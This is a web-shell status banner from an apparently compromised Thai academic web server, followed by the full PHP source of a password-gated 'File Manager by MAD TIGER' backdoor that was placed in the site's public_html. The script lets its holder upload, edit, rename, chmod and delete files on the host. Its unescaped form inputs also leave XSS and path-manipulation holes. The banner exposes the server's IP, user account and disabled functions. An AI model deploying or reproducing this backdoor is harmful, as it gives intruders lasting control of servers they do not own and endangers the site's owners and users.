| Server IP : 122.155.17.190 / Your IP : 18.222.226.15 Web Server : Apache/2 System : Linux cat17190.thaihostserver.com 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64 User : t1bnc ( 1042) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/t1bnc/domains/t1bnc.ac.th/public_html/ |
Upload File : |
<?php
session_start();
// ✅ SETTINGS
$password = 'YourStrongPasswordHere'; // Change this!
$baseDir = __DIR__;
$dir = isset($_POST['dir']) ? base64_decode($_POST['dir']) : $baseDir;
// 🛡️ Prevent Path Traversal
if (strpos(realpath($dir), $baseDir) !== 0) {
die("Access Denied.");
}
// 🐞 DEBUG MODE
ini_set('display_errors', 1);
error_reporting(E_ALL);
// 🔐 AUTH
if (!isset($_SESSION['auth'])) {
if (isset($_POST['login']) && $_POST['password'] === $password) {
$_SESSION['auth'] = true;
} else {
echo '<style>
body { font-family: "Segoe UI", Arial, sans-serif; background: linear-gradient(to bottom, #1a1a2e, #16213e); color: #fff; display: flex; height: 100vh; justify-content: center; align-items: center; margin: 0; }
form { background: #2a2a4a; padding: 40px; border-radius: 15px; box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5); width: 300px; text-align: center; }
h2 { margin-bottom: 20px; color: #00ff88; }
input { padding: 12px; width: 100%; margin: 10px 0; background: #3a3a5a; border: 1px solid #444; color: #fff; border-radius: 8px; box-sizing: border-box; }
input[type=submit] { background: #00ff88; border: none; color: #000; font-weight: bold; cursor: pointer; transition: background 0.3s; }
input[type=submit]:hover { background: #00cc70; }
</style>
<form method="POST">
<h2>🔒 Login</h2>
<input type="password" name="password" placeholder="Enter Password">
<input type="submit" name="login" value="Login">
</form>';
exit;
}
}
// ✅ HANDLE ACTIONS
if (isset($_FILES['upload'])) {
$target = $dir . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
move_uploaded_file($_FILES['upload']['tmp_name'], $target);
}
if (isset($_POST['edit']) && isset($_POST['newcontent'])) {
file_put_contents($dir . DIRECTORY_SEPARATOR . $_POST['edit'], $_POST['newcontent']);
}
if (isset($_POST['rename']) && isset($_POST['newname'])) {
rename($dir . DIRECTORY_SEPARATOR . $_POST['rename'], $dir . DIRECTORY_SEPARATOR . $_POST['newname']);
}
if (isset($_POST['chmod']) && isset($_POST['newperm'])) {
$perm = octdec($_POST['newperm']);
chmod($dir . DIRECTORY_SEPARATOR . $_POST['chmod'], $perm);
}
if (isset($_POST['delete']) && !empty($_POST['selected'])) {
foreach ($_POST['selected'] as $file) {
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
rmdir($path); // Only deletes empty directories
} else {
unlink($path);
}
}
}
if (isset($_POST['create_dir']) && !empty($_POST['dirname'])) {
$newDir = $dir . DIRECTORY_SEPARATOR . $_POST['dirname'];
if (!file_exists($newDir)) {
mkdir($newDir, 0755);
}
}
// ✅ HTML START
echo <<<HTML
<!DOCTYPE html>
<html>
<head>
<title>File Manager by MAD TIGER</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
font-family: "Segoe UI", Arial, sans-serif;
background: linear-gradient(to bottom, #1a1a2e, #16213e);
color: #e0e0e0;
padding: 20px;
margin: 0;
min-height: 100vh;
}
.container {
max-width: 1200px;
margin: 0 auto;
}
h1 {
text-align: center;
color: #00ff88;
text-shadow: 0 0 10px rgba(0, 255, 136, 0.5);
margin-bottom: 10px;
}
.branding {
text-align: center;
font-size: 0.9em;
color: #aaaaaa;
margin-bottom: 20px;
}
.branding a {
color: #00ff88;
text-decoration: none;
}
.branding a:hover {
text-decoration: underline;
}
.box {
background: #2a2a4a;
padding: 20px;
border-radius: 10px;
box-shadow: 0 4px 16px rgba(0, 0, 0, 0.3);
margin-bottom: 20px;
}
button, input[type=submit] {
background: #00ff88;
border: none;
padding: 8px 16px;
border-radius: 6px;
color: #000;
font-weight: bold;
cursor: pointer;
transition: background 0.3s, transform 0.1s;
}
button:hover, input[type=submit]:hover {
background: #00cc70;
transform: translateY(-1px);
}
input[type=text], input[type=file], textarea {
width: 100%;
padding: 10px;
margin-top: 10px;
background: #3a3a5a;
border: 1px solid #444;
color: #e0e0e0;
border-radius: 6px;
box-sizing: border-box;
}
textarea {
resize: vertical;
min-height: 100px;
}
ul {
list-style: none;
padding: 0;
}
li {
padding: 12px;
background: #3a3a5a;
margin-bottom: 8px;
border-radius: 8px;
display: flex;
align-items: center;
transition: background 0.2s;
}
li:hover {
background: #4a4a6a;
}
.actions {
display: flex;
gap: 8px;
margin-left: auto;
}
form.inline {
display: inline;
}
.details {
font-size: 0.85em;
color: #aaaaaa;
flex: 1;
margin-left: 20px;
}
.pwd-box {
margin-bottom: 20px;
background: #2a2a4a;
padding: 15px;
border-radius: 10px;
}
.pwd-segment {
background: none;
border: none;
color: #00ff88;
font-weight: bold;
cursor: pointer;
padding: 0;
font-size: 1em;
}
.pwd-segment:hover {
text-decoration: underline;
}
.checkbox {
width: auto;
margin-right: 12px;
}
.breadcrumb {
margin-bottom: 20px;
font-size: 0.9em;
}
.breadcrumb button {
background: none;
color: #00ff88;
padding: 0;
font-weight: normal;
}
.breadcrumb button:hover {
text-decoration: underline;
background: none;
transform: none;
}
@media (max-width: 600px) {
li {
flex-direction: column;
align-items: flex-start;
}
.actions {
margin-left: 0;
margin-top: 10px;
}
.details {
margin-left: 0;
margin-top: 10px;
}
}
</style>
</head>
<body>
<div class="container">
<h1>🗂️ File Manager</h1>
<div class="branding">Created by MAD TIGER | Telegram: <a href="https://t.me/DevidLuice" target="_blank">@DevidLuice</a></div>
HTML;
// 🖥️ PWD (Current Directory) with Clickable Segments
echo '<div class="pwd-box">
<strong>Current Directory: </strong>';
$segments = explode(DIRECTORY_SEPARATOR, $dir);
$path = '';
$first = true;
foreach ($segments as $segment) {
if (empty($segment)) {
$path = DIRECTORY_SEPARATOR;
echo "<form method='POST' class='inline'>
<input type='hidden' name='dir' value='" . base64_encode($path) . "'>
<button type='submit' class='pwd-segment'>/</button>
</form>";
continue;
}
$path .= ($first ? '' : DIRECTORY_SEPARATOR) . $segment;
$first = false;
echo "<span>/</span>
<form method='POST' class='inline'>
<input type='hidden' name='dir' value='" . base64_encode($path) . "'>
<button type='submit' class='pwd-segment'>$segment</button>
</form>";
}
echo " <form method='POST' class='inline'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<button type='submit'>[Go]</button>
</form>
</div>";
// 🔙 Go Back
$parent = dirname($dir);
if (strpos(realpath($parent), $baseDir) === 0 && $parent !== $dir) {
echo "<form method='POST'>
<input type='hidden' name='dir' value='" . base64_encode($parent) . "'>
<button type='submit'>⬅️ Go Back</button>
</form><br>";
}
// 🧭 Breadcrumb
$segments = explode(DIRECTORY_SEPARATOR, str_replace($baseDir, '', $dir));
$path = $baseDir;
echo "<div class='breadcrumb'><strong>Path:</strong> ";
echo "<form method='POST' class='inline'><input type='hidden' name='dir' value='" . base64_encode($baseDir) . "'><button type='submit'>root</button></form>";
foreach ($segments as $segment) {
if ($segment === '') continue;
$path .= DIRECTORY_SEPARATOR . $segment;
echo " / <form method='POST' class='inline'>
<input type='hidden' name='dir' value='" . base64_encode($path) . "'>
<button type='submit'>$segment</button>
</form>";
}
echo "</div>";
// 📤 Upload
echo "<div class='box'>
<h3>📤 Upload File</h3>
<form method='POST' enctype='multipart/form-data'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='file' name='upload'>
<input type='submit' value='Upload'>
</form>
</div>";
// 📁 Create Directory
echo "<div class='box'>
<h3>📁 Create New Directory</h3>
<form method='POST'>
<input type='text' name='dirname' placeholder='Enter directory name'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='submit' name='create_dir' value='Create'>
</form>
</div>";
// 📝 Edit file content
if (isset($_POST['edit']) && !isset($_POST['newcontent'])) {
$filePath = $dir . DIRECTORY_SEPARATOR . $_POST['edit'];
$content = htmlspecialchars(file_get_contents($filePath));
echo "<div class='box'><h3>✏️ Editing: {$_POST['edit']}</h3>
<form method='POST'>
<textarea name='newcontent' rows='20'>$content</textarea>
<input type='hidden' name='edit' value='{$_POST['edit']}'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='submit' value='Save'>
</form></div>";
exit;
}
// ✏️ Rename
if (isset($_POST['rename']) && !isset($_POST['newname'])) {
echo "<div class='box'><h3>✏️ Rename: {$_POST['rename']}</h3>
<form method='POST'>
<input type='text' name='newname' value='{$_POST['rename']}'>
<input type='hidden' name='rename' value='{$_POST['rename']}'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='submit' value='Rename'>
</form></div>";
exit;
}
// 🔒 Chmod
if (isset($_POST['chmod']) && !isset($_POST['newperm'])) {
$filePath = $dir . DIRECTORY_SEPARATOR . $_POST['chmod'];
$currentPerm = substr(sprintf('%o', fileperms($filePath)), -4);
echo "<div class='box'><h3>🔒 Chmod: {$_POST['chmod']}</h3>
<form method='POST'>
<input type='text' name='newperm' value='$currentPerm' placeholder='e.g., 0644'>
<input type='hidden' name='chmod' value='{$_POST['chmod']}'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='submit' value='Change'>
</form></div>";
exit;
}
// 📁 List Files & Folders with Details
echo "<div class='box'>
<h3>📂 Files & Folders</h3>
<form method='POST'>
<input type='hidden' name='dir' value='" . base64_encode($dir) . "'>
<input type='submit' name='delete' value='Delete Selected' onclick='return confirm(\"Are you sure?\")'>
<ul>";
$files = scandir($dir);
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $file;
$encodedDir = base64_encode($dir);
// 📊 Enhanced File/Folder Details
$details = "";
if (is_file($path)) {
$size = filesize($path);
$size = $size < 1024 ? "$size B" : ($size < 1048576 ? round($size / 1024, 2) . " KB" : round($size / 1048576, 2) . " MB");
$details .= "Size: $size | ";
}
$perms = substr(sprintf('%o', fileperms($path)), -4);
$modified = date("Y-m-d H:i", filemtime($path));
$owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($path))['name'] : fileowner($path);
$group = function_exists('posix_getgrgid') ? posix_getgrgid(filegroup($path))['name'] : filegroup($path);
$type = is_dir($path) ? "Directory" : (function_exists('mime_content_type') ? mime_content_type($path) : "File");
$details .= "Type: $type | Perms: $perms | Owner: $owner | Group: $group | Modified: $modified";
echo "<li>";
echo "<input type='checkbox' name='selected[]' value='$file' class='checkbox'>";
if (is_dir($path)) {
echo "📁 <form method='POST' class='inline'>
<input type='hidden' name='dir' value='" . base64_encode($path) . "'>
<button type='submit'>$file</button>
</form>";
} else {
echo "📄 $file";
}
echo "<span class='details'>$details</span>
<div class='actions'>
<form method='POST' class='inline'>
<input type='hidden' name='edit' value='$file'>
<input type='hidden' name='dir' value='$encodedDir'>
<input type='submit' value='Edit'>
</form>
<form method='POST' class='inline'>
<input type='hidden' name='rename' value='$file'>
<input type='hidden' name='dir' value='$encodedDir'>
<input type='submit' value='Rename'>
</form>
<form method='POST' class='inline'>
<input type='hidden' name='chmod' value='$file'>
<input type='hidden' name='dir' value='$encodedDir'>
<input type='submit' value='Chmod'>
</form>
</div>";
echo "</li>";
}
echo "</ul></form></div></div></body></html>";
?>